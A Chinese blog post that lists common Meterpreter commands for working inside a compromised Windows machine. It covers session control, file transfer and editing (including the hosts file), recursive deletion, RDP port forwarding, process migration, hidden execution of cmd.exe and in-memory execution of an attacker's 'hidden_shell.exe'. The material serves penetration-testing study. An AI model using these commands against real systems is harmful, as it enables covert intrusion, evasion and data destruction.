devbox
花生_TL007
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

Meterpreter常用命令介绍_不小心退出了meterpreter

作者:花生_TL007 | 2024-04-20 09:52:20

不小心退出了meterpreter

基本命令

  1. 1.background:将meterpreter终端隐藏在后台(快捷键ctrl+z)
  2.  
  3. 2.sessions:查看已经成功获得的会话,如果想继续与某会话交互,可以使用sessions -i 命令.
  4.  
  5. 3.quit:直接关闭当前的meterpreter会话,返回MSF终端.
  6.  
  7. 4.shell:获取目标系统的控制台shell.
  8.  
  9. 5.irb:在meterpreter会话与ruby终端交互.


文件系统命令

  1. 1.cat:查看文件内容.
  2.  
  3. 2.getwd:获得目标机器上当前的工作目录,getlwd,这个命令可以获得当前系统的工作目录.
  4.  
  5. 3.upload:可以上传文件或文件夹到目标机器上;upload 要上传的文件 C:\Users\buzz\Desktop
  6.  
  7. 4.download:从目标机器上下载文件或文件夹,注意windows路径要用双斜杠进行转义. download C:\\test.txt /root/home/test
  8.  
  9. 5. edit:调用vi编辑器,对目标机器上的文件进行编辑;edit c:\\windows\\system32\\drivers\\etc\\hosts
  10.  
  11. 6. search:可通过search -h查看帮助信息,参数-d指定搜索的起始目录或驱动,如果为空,将进行全盘搜索;参数-f指定搜索的文件或部分文件名,支持星号(*)匹配;参数-r递归搜索子目录.
  12. search -d c:\\windows -f *.txt
  13.  
  14. 7.rm:删除目标机器的文件.
  15.  
  16. 8.rmdir /s/q c:\\test:进入shell后使用此命令可以删除目录下的所有文件和文件夹,/s表示所有子目录和文件/q表示安静模式,不显示yes or no.


网络命令

  1. 1.ipconfig:查看目标机器网络接口信息
  2.  
  3. 2.portfwd:它是meterpreter自带的端口转发器,用于把目标机器的端口转发到本地端口;假设目标机开放了3389端口,使用如下命令将其转发到本地3456端口:portfwd add -l 3456 -p 3389 -r 192.168.88.110
  4.  
  5. 3.rdesktop -u 用户名 -p 密码 ip:端口  连接开启远程桌面的windows系统.
  6.  
  7. 4.route:显示目标机器的路由信息.


系统命令

  1. 1.ps:用于获得目标主机上正在运行的进程信息.
  2.  
  3. 2.migrate pid:将Meterpreter会话从一个进程迁移到另一个进程的内存空间中,可以配合ps -ef |grep explorer.exe
  4.  
  5. 3.execute:在目标机器上执行文件.    execute -H -i -f cmd.exe 直接与cmd进行交互.  参数-H 表示隐藏执行 -i 表示直接与cmd交互.
  6. 另外execute命令的-m参数支持直接从内存中执行攻击者的可执行文件.    execute -H -m -d regedit.exe -f hidden_shell.exe
  7. 具体参数介绍:
  8. Executes a command on the remote machine.
  9. OPTIONS:
  10.     -H        Create the process hidden from view.
  11.     -a <opt>  The arguments to pass to the command.
  12.     -c        Channelized I/O (required for interaction).
  13.     -d <opt>  The 'dummy' executable to launch when using -m.
  14.     -f <opt>  The executable command to run.
  15.     -h        Help menu.
  16.     -i        Interact with the process after creating it.
  17.     -k        Execute process on the meterpreters current desktop
  18.     -m        Execute from memory.
  19.     -s <opt>  Execute process in a given session as the session user
  20.     -t        Execute process with currently impersonated thread token
  21.  
  22. 4.getpid:获得当前会话所在进程的PID值.
  23.  
  24. 5.kill:用于终结指定的PID进程.
  25.  
  26. 6.getuid:用于获得运行meterpreter会话的用户名,从而查看当前会话具有的权限.
  27.  
  28. 7.sysinfo:用于得到目标系统的一些信息,例如机器名,操作系统等.
  29.  
  30. 8.shutdown:用于关闭机器,meterpreter会话会断开.

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/花生_TL007/article/detail/456708
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号